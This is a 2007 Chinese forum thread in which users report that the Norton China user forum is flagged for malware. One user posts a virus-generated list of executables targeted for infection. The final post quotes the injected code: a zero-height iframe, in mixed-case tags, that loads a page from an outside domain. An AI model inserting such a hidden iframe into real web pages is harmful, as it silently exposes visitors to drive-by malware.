诺顿中国使用者论坛被挂毒

zhuoqingquan

NIS2008报毒

Redevil

还存在。。。

曲中求

赶上了

taopaolang1982

EAV也报了 。

hihi

nod32也报毒

qigang

RX20.17.52杀！

bjprogrammer

应该是服务器中的毒吧

jehovah_king

原帖由 hljdqzr 于 2007-11-10 13:59 发表

不是官方的,是民间爱好者自发组织的.

备案
诺顿中国使用者 所有版权归美国symantec赛门铁克公司所有,如有侵权,
请及时与我们联系



这是指什么？

[ 本帖最后由 jehovah_king 于 2007-11-11 07:57 编辑 ]

a256886572008

win.log的結構

D:\1.exe
D:\CPILSuite\cpil.exe
D:\CPILSuite\CPILSuite.exe
D:\Memory\saved files\framxpro\Install FreeRAM XP Pro 1.52.exe
D:\MSOCache\All Users\90000404-6000-11D3-8CFE-0150048383C9\FILES\PFILES\COMMON\MSSHARED\DW\DW20.EXE
D:\MSOCache\All Users\90000404-6000-11D3-8CFE-0150048383C9\FILES\PFILES\COMMON\MSSHARED\DW\DWTRIG20.EXE
D:\MSOCache\All Users\90000404-6000-11D3-8CFE-0150048383C9\FILES\PFILES\MSOFFICE\OFFICE11\OFFCLN.EXE
D:\MSOCache\All Users\90000404-6000-11D3-8CFE-0150048383C9\FILES\SETUP\OSE.EXE
D:\MSOCache\All Users\90A40404-6000-11D3-8CFE-0150048383C9\FILES\SETUP\OSE.EXE
D:\MSOCache\All Users\90AA0404-6000-11D3-8CFE-0150048383C9\FILES\SETUP\OSE.EXE
D:\MSOCache\All Users\90AC0404-6000-11D3-8CFE-0150048383C9\FILES\SETUP\OSE.EXE
D:\MSOCache\All Users\90AD0404-6000-11D3-8CFE-0150048383C9\FILES\SETUP\OSE.EXE
D:\software\NTPClock.exe
D:\software\Srv.exe
D:\software\Ascii加解密\Ascii加解密.exe
D:\software\Autoruns\autoruns.exe
D:\software\Autoruns\autorunsc.exe
D:\software\comodo\CFP_Setup_3.0.10.238_XP_Vista_x32_BETA.exe
D:\software\comodo\CFP_Setup_3.0.11.246_XP_Vista_x32_RC1.exe
D:\software\convertz802\ConvertZ.exe
D:\software\delete\delete.exe
D:\software\epsnap\EPSnap.exe
D:\software\EQSecure\EQSysSecureSetup.exe
D:\software\EVEREST Ultimate Edition 4.00.1033\everest.exe
D:\software\IceSword122en\IceSword122en\IceSword.exe
D:\software\odbg110\OLLYDBG.EXE
D:\software\Returnil\RVS_free.exe
D:\software\sreng2\SREngPS.EXE
D:\software\Srv\Srv.exe
D:\software\USB_v1.2\USB 隨身碟病毒免疫器 v1.2\USB_antiprotect\AntiU v1.2.exe
D:\software\wefong\wefong\微風查詢器.exe
D:\software\windows_v7.75_build_7.806\windows v7.75 build 7.806\Windows優化大師 V7.75 Build 7.806\setup.exe
D:\software\winMd5Sum\winMd5Sum.exe
D:\software\Wsyscheck0725中文版\Wsyscheck.exe
D:\software\超级网马解密工具\超级网马解密工具.exe
D:\test1\test1\ex1_v_isim_beh.exe
D:\test2\test2\ex4_v_isim_beh.exe
D:\test3\crt.exe
D:\test3\test3\ex7_v_isim_beh.exe
D:\備份檔案\Norton_Removal_Tool.exe
D:\備份檔案\AntiVir\registrycleaner\Avira_RegistryCleaner.exe
D:\備份檔案\bootvis\BootVis.exe
D:\備份檔案\msn_customemoticons_add_v3.5.1\MSN Custom ICON Auto Addin V3.5 Release\MSN Custom ICON Auto Addin V3.5.1.exe
D:\備份檔案\pc booster 5.0 註冊版\安裝主程式\pcb50setup.exe
D:\備份檔案\pc booster 5.0 註冊版\繁體中文化\PCBooster v 5.0 繁體中文化.exe
D:\大2下資料夾\Logic Design Lab\Lab3\ex1way1\ex1way1_2_v_isim_beh.exe
D:\大2下資料夾\Logic Design Lab\Lab3\ex1way2\ex1way2_2_v_isim_beh.exe
D:\大2下資料夾\Logic Design Lab\Lab3\ex2way1\ex2way1_2_v_isim_beh.exe
D:\大2下資料夾\Logic Design Lab\Lab3\ex2way2\ex2way2_2_v_isim_beh.exe
D:\大2下資料夾\Logic Design Lab\Lab3\ex3way1\ex3way1_2_v_isim_beh.exe
D:\大2下資料夾\Logic Design Lab\Lab3(1)\ex1\ex1_2_v_isim_beh.exe
D:\大2下資料夾\Logic Design Lab\Lab3(1)\ex3\ex3_2_v_isim_beh.exe
D:\桌面\Firewall\breakout-wp.exe
D:\桌面\Firewall\cpil.exe
D:\桌面\Firewall\dnstester.exe
D:\桌面\Firewall\jumper.exe
D:\桌面\Firewall\PCFlankLeaktest.exe
D:\桌面\Firewall\surfer.exe
D:\桌面\Firewall\tooleaky.exe
D:\桌面\Firewall\WallBreaker.exe
D:\桌面\Firewall\apt\apt.exe
D:\桌面\Firewall\Breakout\Breakout\breakout-ie.exe
D:\桌面\Firewall\Breakout\Breakout\breakout-mz.exe
D:\桌面\Firewall\CPILSuite\cpil.exe
D:\桌面\Firewall\CPILSuite\CPILSuite.exe
D:\桌面\Firewall\WinArpAttacker3.50\WinArpAttacker.exe
D:\桌面\Firewall\WinArpAttacker3.50\WinPcap_3_1.exe
D:\桌面\virus\virus\1.exe
D:\桌面\virus\virus\4\1.exe
D:\桌面\virus\傷心的人\Dx3.exe
D:\桌面\virus\傷心的人\zz.exe
D:\驅動程式備份\Drivers\Realtek AC'97 Audio\RTLCPL.EXE
D:\驅動程式備份\Drivers\Realtek AC'97 Audio\SOUNDMAN.EXE
D:\驅動程式備份\Drivers\SiS 900-Based PCI Fast Ethernet Adapter\uninst.exe

上面就是病毒利用cmd.exe列表出來，想要感染非系統槽的*.EXE

bjprogrammer

<iFrAmE src=http://www.smsunionmm.com/117/ width=100 height=0></IfRaMe>

楼上强..